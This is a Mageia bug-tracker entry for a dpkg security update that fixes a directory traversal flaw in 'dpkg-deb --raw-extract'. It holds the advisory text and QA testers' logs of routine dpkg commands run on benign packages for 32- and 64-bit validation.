| Summary: | dpkg new security issue rhbz#1598872 | ||
|---|---|---|---|
| Product: | Mageia | Reporter: | David Walser <luigiwalser> |
| Component: | Security | Assignee: | QA Team <qa-bugs> |
| Status: | RESOLVED FIXED | QA Contact: | Sec team <security> |
| Severity: | normal | ||
| Priority: | Normal | CC: | bruno, herman.viaene, sysadmin-bugs, tarazed25, tmb |
| Version: | 6 | Keywords: | advisory, validated_update |
| Target Milestone: | --- | ||
| Hardware: | All | ||
| OS: | Linux | ||
| Whiteboard: | MGA6-32-OK MGA6-64-OK | ||
| Source RPM: | dpkg-1.18.23-1.mga6.src.rpm | CVE: | |
| Status comment: | |||
|
Description
David Walser
2018-08-08 20:22:04 CEST
David Walser
2018-08-08 20:22:15 CEST
Whiteboard:
(none) =>
MGA6TOO Updated packages uploaded by Bruno. Advisory: ======================== Updated dpkg packages fix security vulnerability: A flaw was found dpkg which allows an attacker to perform a directory traversal by extracting with "dpkg-deb --raw-extract" a crafted .deb file with a /DEBIAN symlink (bdo#879982). References: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=879982 https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/64MG54Q347INMLYDW47XBYZQ3BQCXEXC/ ======================== Updated packages in core/updates_testing: ======================== dpkg-1.18.25-1.mga6 perl-Dpkg-1.18.25-1.mga6 from dpkg-1.18.25-1.mga6.src.rpm CC:
(none) =>
bruno Updates have been pushed into mga6 and cauldron (no update for 5 which is out of maintenance window now) Status:
NEW =>
ASSIGNED MGA6-32 MATE on IBM Thinkpad R50e in Dutch No installation issues. Took some inspiration from bug 13279. Note that a lot of dpkg options return an error when no package has been yet installed. What produced decent feedback after downloading some .deb file: # dpkg --version Programma voor Debian pakketbeheer 'dpkg' versie 1.18.25 (i386). Dit is vrije programmatuur; zie de GNU General Public Licentie versie 2 of later voor kopieervoorwaarden. Er is GEEN garantie. Is OK # dpkg -c qr-code-creator_1.0_all.deb drwxr-xr-x root/root 0 2011-03-26 18:32 ./ drwxr-xr-x root/root 0 2011-03-26 18:32 ./usr/ drwxr-xr-x root/root 0 2011-03-26 18:32 ./usr/share/ drwxr-xr-x root/root 0 2011-03-26 18:32 ./usr/share/man/ drwxr-xr-x root/root 0 2011-03-26 18:32 ./usr/share/man/man1/ -rw-r--r-- root/root 385 2011-03-26 18:32 ./usr/share/man/man1/qr-code-creator.1.gz drwxr-xr-x root/root 0 2011-03-26 18:32 ./usr/share/pixmaps/ -rw-r--r-- root/root 238 2011-03-26 18:32 ./usr/share/pixmaps/qr-code-creator.png drwxr-xr-x root/root 0 2011-03-26 18:32 ./usr/share/doc/ drwxr-xr-x root/root 0 2011-03-26 18:32 ./usr/share/doc/qr-code-creator/ -rw-r--r-- root/root 1235 2011-03-26 18:32 ./usr/share/doc/qr-code-creator/copyright -rw-r--r-- root/root 157 2011-03-26 18:32 ./usr/share/doc/qr-code-creator/changelog.gz drwxr-xr-x root/root 0 2011-03-26 18:32 ./usr/share/qr-code-creator/ drwxr-xr-x root/root 0 2011-03-26 18:32 ./usr/share/applications/ -rw-r--r-- root/root 217 2011-03-26 18:32 ./usr/share/applications/qr-code-creator.desktop drwxr-xr-x root/root 0 2011-03-26 18:32 ./usr/bin/ -rwxr-xr-x root/root 3717 2011-03-26 18:32 ./usr/bin/qr-code-creator Looks OK# dpkg -x qr-code-creator_1.0_all.deb ./tmp checked that above files have been created in the correct folders under ./tmp: all OK # dpkg --print-architecture i386 This all seems to work well. CC:
(none) =>
herman.viaene x86_64
Could not find a reproducer test file.
Tried out the raw-extract command before updating.
$ mkdir partclone
$ dpkg-deb --raw-extract partclone_0.2.69-1_i386.deb ./partclone
$ ls partclone
DEBIAN/ usr/
Ran the update and tried that again.
$ mkdir phoronix
$ dpkg-deb --raw-extract phoronix-test-suite_5.2.1_all.deb ./phoronix
$ ls phoronix
DEBIAN/ etc/ usr/
Straightforward extraction:
$ mkdir coapp
$ dpkg -x net.downloadhelper.coapp-1.1.2-1_amd64.deb ./coapp
$ tree coapp
coapp
├── etc
│ ├── chromium
│ │ └── native-messaging-hosts
│ │ └── net.downloadhelper.coapp.json
│ └── opt
│ └── chrome
│ └── native-messaging-hosts
│ └── net.downloadhelper.coapp.json
├── opt
│ └── net.downloadhelper.coapp
│ ├── bin
│ │ └── net.downloadhelper.coapp-linux-64
│ ├── config.json
│ ├── converter
[...]
│ │ └── libz.so.1
│ ├── LICENSE.txt
│ └── README.txt
└── usr
└── lib
└── mozilla
└── native-messaging-hosts
└── net.downloadhelper.coapp.json
17 directories, 43 files
Echoed tests from comment 3.
$ dpkg --version
Debian 'dpkg' package management program version 1.18.25 (amd64).
This is free software; see the GNU General Public License version 2 or
later for copying conditions. There is NO warranty.
$ dpkg --print-architecture
amd64
$ dpkg -c partclone_0.2.69-1_i386.deb
drwxr-xr-x root/root 0 2013-12-26 07:18 ./
drwxr-xr-x root/root 0 2013-12-26 07:18 ./usr/
drwxr-xr-x root/root 0 2013-12-26 07:18 ./usr/sbin/
-rwxr-xr-x root/root 67336 2013-12-26 07:18 ./usr/sbin/partclone.fat
[...]
lrwxrwxrwx root/root 0 2013-12-26 07:18 ./usr/share/man/man8/partclone.vmfs.8.gz -> partclone.8.gz
lrwxrwxrwx root/root 0 2013-12-26 07:18 ./usr/share/man/man8/partclone.extfs.8.gz -> partclone.8.gz
No regressions so OK for 64-bits.CC:
(none) =>
tarazed25
Len Lawrence
2018-08-22 20:01:35 CEST
Whiteboard:
MGA6-32-OK =>
MGA6-32-OK MGA-64-OK
Len Lawrence
2018-08-22 20:02:46 CEST
Whiteboard:
MGA6-32-OK MGA-64-OK =>
MGA6-32-OK MGA6-64-OK
Len Lawrence
2018-08-23 10:55:33 CEST
Keywords:
(none) =>
validated_update
Thomas Backlund
2018-08-24 00:27:57 CEST
Keywords:
(none) =>
advisory An update for this issue has been pushed to the Mageia Updates repository. https://advisories.mageia.org/MGASA-2018-0352.html Resolution:
(none) =>
FIXED |